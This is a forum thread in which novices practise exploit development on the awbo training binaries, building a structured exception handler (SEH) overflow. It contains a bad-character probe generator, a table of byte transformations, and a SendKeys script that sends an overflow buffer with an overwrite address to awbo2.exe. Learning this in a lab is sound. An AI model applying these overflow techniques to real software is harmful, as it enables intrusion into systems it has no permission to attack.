Pentesting: Specific topics related to legal penetration testing
Hello,
I'm pretty new to developing exploits and I'm trying the awbo exercises, which can be found at snort.org/vrt/tools/awbo.html ... I've successfully triggered the vulnerability (on the first exercise), which is a SEH overflow... At my current level of knowledge I'm stuck on 3 points:

1 - The payload I need to jump to is before the SEH overflow
2 - The opcodes to a JUMP SHORT do not work (bad chars I believe...), another problem is that I need to jump over 128 bytes before, so a SHORT won't work
3 - Required opcodes to decode the payload seem to be blocked (x86/alpha_upper), I've also tested the x86/alpha_mixed...

Is there any tool which generates a list of opcodes that I may insert as a payload and analyse what the bad chars are? What about the other issues I've mentioned? Any help is appreciated! Thank you.
Hmmm, I'm pretty new to exploit development also. How about generating a string with the entire ascii set (omitting the null character of course). Send that in the buffer and check it out through the debugger. See what gets filtered and exclude those characters as bad. I guess you might need to run it through several times to get all the badchars.
That's the advice given in The Shellcoder's Handbook in any case, and it seemed to work for me. I'd also appreciate any recommendations on a better way. Oh, thanks for the tip on the awbo exercises as well; I hadn't seen those before so extra practice ahead! As for the tool to find opcodes: msfpescan maybe? I'm very new to jumps so haven't had much experience there sorry. Is there such a thing as a LONG jump though or can you use two SHORT jumps?

Cheers

Last edited by F1gureF0ur; 10-15-2009 at 03:45 PM.
Thanks for the help F1gureF0ur!
I've made this script in order to generate the string and redirected its output to a file:
Code:
import sys

# Emit every byte value except NUL as an escaped string literal: "\x01\x02...\xff".
# The loop bound was 255, which silently left out \xff; it now runs through 255 inclusive.
sys.stdout.write("\"")
i = 1
while i < 256:
    sys.stdout.write("\\x")
    if i < 16:
        sys.stdout.write("0")     # zero-pad single-digit hex values
    sys.stdout.write(hex(i)[2:])  # strip the leading "0x"
    i += 1
print("\"")

Code:
\x61 -> \x85
\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f -> \x3f
\xa2 -> \x9b
\xa3 -> \x9c
\xa7 -> \x15
\xa9 -> \x22
\xaa -> \xa6
\xac -> \xaa
\xb0 -> \xf8
\xb2 -> \xfd
\xb3 -> \x33
\xb8 -> \x27
\xb9 -> \x31
\xba -> \xa7
\xbb -> \x3d
\xbc -> \x2c
\xbd -> \x2d
\xbe -> \x2e
\xbf -> \x3b
\xc0 -> \x27
\xdc -> \x5d
\xdd -> \x5b
\xde -> \x7e
\xe3\xe4 -> \x30
\xe2 -> \x5c
\xe7 -> \x87

These are the ones that did not appear in the memory:
Code:
\x07\x08\x0a\x0d\x13\x14\x1b\x25\x28\x29\x2b\x5e\x5f\x60\x7b\x7d\x7e\x7f\x81\x8d\x8f\x90\x9d\xa0\xa1\xa4\xa5\xa6\xa8\xab\xad\xae\xaf\xb1\xb4\xb5\xb6\xb7\xc3\xc4\xc5\xc6\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1

Thank you again.
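As an added worked example (not code from the thread, the posters, or awbo), this is the comparison step F1gureF0ur describes done programmatically rather than by eye in the debugger: the probe string is diffed against the bytes read back from memory so each value is classified as intact, transformed or dropped, and a dropped byte does not shift every later comparison. `simulate_filter` is a constructed stand-in for the target so the script runs offline; the mapping it applies is invented, not awbo's behaviour.

```python
from difflib import SequenceMatcher


def probe_bytes(skip=(0x00,)):
    """Every byte value except those in skip (NUL is the usual exclusion)."""
    return bytes(b for b in range(256) if b not in skip)


def classify(probe, observed):
    """Diff the probe against what came back from memory.

    Returns (intact, transformed, dropped): bytes that arrived unchanged,
    a dict original -> replacement, and bytes with no counterpart at all.
    """
    sm = SequenceMatcher(None, probe, observed, autojunk=False)
    intact, transformed, dropped = [], {}, []
    for tag, i1, i2, j1, j2 in sm.get_opcodes():
        if tag == "equal":
            intact.extend(probe[i1:i2])
        elif tag == "delete":
            dropped.extend(probe[i1:i2])
        elif tag == "replace":
            src, dst = probe[i1:i2], observed[j1:j2]
            # Equal-length runs pair 1:1; any overhang in src was dropped.
            for k, b in enumerate(src):
                if k < len(dst):
                    transformed[b] = dst[k]
                else:
                    dropped.append(b)
        # "insert": bytes in memory that were never sent; nothing to classify.
    return intact, transformed, dropped


def report(transformed, dropped):
    """Render the result in the thread's '\\xNN -> \\xMM' style."""
    lines = ["\\x%02x -> \\x%02x" % (a, b) for a, b in sorted(transformed.items())]
    lines.append("dropped: " + "".join("\\x%02x" % b for b in dropped))
    return "\n".join(lines)


def simulate_filter(data):
    """Constructed stand-in for the target (invented, not awbo): drops CR/LF
    and rewrites a few high bytes, so the example runs without a debugger."""
    rewrite = {0x80: 0x3f, 0x81: 0x3f, 0x82: 0x3f, 0x83: 0x3f, 0xa9: 0x22}
    return bytes(rewrite.get(b, b) for b in data if b not in (0x0a, 0x0d))


if __name__ == "__main__":
    sent = probe_bytes()
    ok, changed, gone = classify(sent, simulate_filter(sent))
    print(report(changed, gone))
```

With a real run, `observed` is the byte dump copied out of the debugger at the buffer's address. Several bytes the post lists as absent (\x25, \x28, \x29, \x2b, \x5e, \x7b, \x7d, \x7e) are exactly the characters WScript.Shell SendKeys reserves for modifiers and grouping, which is consistent with the later suspicion in the thread that the delivery method rather than the target is filtering them.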
I used a modified version of the jump code from this page last time I did an SEH overwrite, to get to the earlier section of my buffer from the section of memory after the SEH address.
You'll probably be able to roll your own using the details at the link above, but if you like I can post the assembly and provide the method I used to convert it to shellcode (my rubbish assembly skills necessitated some nasty hacks, but it worked).
__________________
Nancy Astor: If I were your wife I would put poison in your coffee! Winston Churchill: Madam, if I were your husband I would drink it.
That's a nice little article. Thanks lupin
I also found a couple of the videos (webcasts) in the Offensive Security website resources section helpful with SEH overflows. The Apple QuickTime vid is good, as is the SurgeMail overview. If anyone can point to any other good resources I'd be grateful!
There's some more good stuff here, and here, and the securityforest site that my previous link was from has some other good references.
Thank you for the replies!
I've also found Offensive Security's webcast very didactic, pretty good resource. Thank you lupin for the links provided, I'll study that and post the results of my tests as soon as possible. There's still the bad chars issue, but one step at a time. As soon as I can get EIP pointing to my buffer, I'll focus on that problem. =) (or... perhaps I should solve the bad chars issue before?)
lupin, the jump backwards assembly code worked! I hardcoded it into immunity dbg though, since I think my string input method is a piece of...
This is the code I'm using to send the string:
Code:
import win32com.client

# Drive the target's console window through WScript.Shell and type the buffer
# in as keystrokes (pywin32 required, target already running under the debugger).
shell = win32com.client.Dispatch("WScript.Shell")
shell.AppActivate('awbo2.exe')
# 1076 bytes of padding, 4 filler bytes, then a little-endian address (0x0040106b)
shell.SendKeys(('A' * 1076) + "\x42\x42\x42\x42\x6b\x10\x40\x00")
shell.SendKeys('{ENTER}')

I think the bad chars problem originates from the method I'm currently using. Is there a better way to send the string to the program when it's opened with immdbg?